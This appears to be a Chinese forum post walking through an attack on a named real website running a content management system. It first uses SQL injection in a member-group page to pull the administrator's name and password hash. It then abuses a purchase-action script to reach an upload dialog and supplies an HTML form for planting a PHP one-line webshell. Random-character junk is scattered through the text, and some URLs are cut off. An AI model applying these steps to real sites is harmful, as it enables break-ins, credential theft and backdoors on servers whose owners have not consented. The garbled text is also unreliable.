①注入漏洞。 H+ q4 s3 Q: V+ H0 F$ ]
这站 http://www.political-security.com/7 ~, x" H4 z; l) Z p- D
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,0 _4 r# q$ b9 b1 Q) f1 o- N3 G
www.political-security.com/data/mysql_error_trace.inc 爆后台
1 ~. `: Y: J$ p. R* S7 I3 Q然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
" p I$ _# A5 O/ [9 B然后写上语句
( _4 n6 n E' J Y: h% E查看管理员帐号
$ J- O4 n u' t+ x: | xhttp://www.political-security.co ... &membergroup=@`, f) }; w [) Z/ i! l M$ {
' W* b) s% S+ f' E* Q) [
admin 7 l1 @$ j S* M; Q0 m- h7 X
1 D: k4 H+ I; {: G |. e; ^查看管理员密码- M2 n) L& ^, `) n; B. ?
http://www.political-security.co ... &membergroup=@`4 p' B3 M$ S) D- U' d" f
& W$ V) b9 u& R) B8d29b1ef9f8c5a5af429
6 y! `9 M6 ]+ |- b: f2 \9 n1 U$ S) m/ x6 }6 K) g5 F
查看管理员密码
" o1 z" _4 o' S8 T) g( r1 S0 v+ R) d7 K: T) }$ s; a
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5# Y0 I7 Y( E& N
7 R7 n+ s% l/ f8d2
4 n2 _+ @( ?5 I" i5 g9 O9b1ef9f8c5a5af422 U" u, p/ i: z- a) D( t
9
( x* ?9 F5 S: {- T4 f! x5 m& n+ V9 y3 s; D- @% r5 x
cmd5没解出来 只好测试第二个方法! O' q% j: o: N- h) M
- @% {9 ~ E6 z% X4 K2 A
& I- x4 q. d1 ~; j②上传漏洞:# ?+ d1 P% v* V1 @' q5 c% ^
$ C: J1 R" j* ?! M- @. ~ x5 i
只要登陆会员中心,然后访问页面链接5 [6 `- C0 d- q4 f* n4 o7 m
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
5 G6 [- r, a8 Q$ g$ M7 x2 W y
& i8 x& [# |* L/ ^ b如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
% Z* }- M* O% Q& m* v1 h W
' X4 ~$ u! G2 @3 n* I& k$ d# U于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm* c. b+ u/ B# q1 Q1 c0 e
5 |" z9 ]) B& x; U% o8 r
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
% ^4 T( w( A9 z- O! b8 `7 z* |或者# L3 _% N2 @2 s6 } T0 e; [9 r I7 ^
即可上传成功 |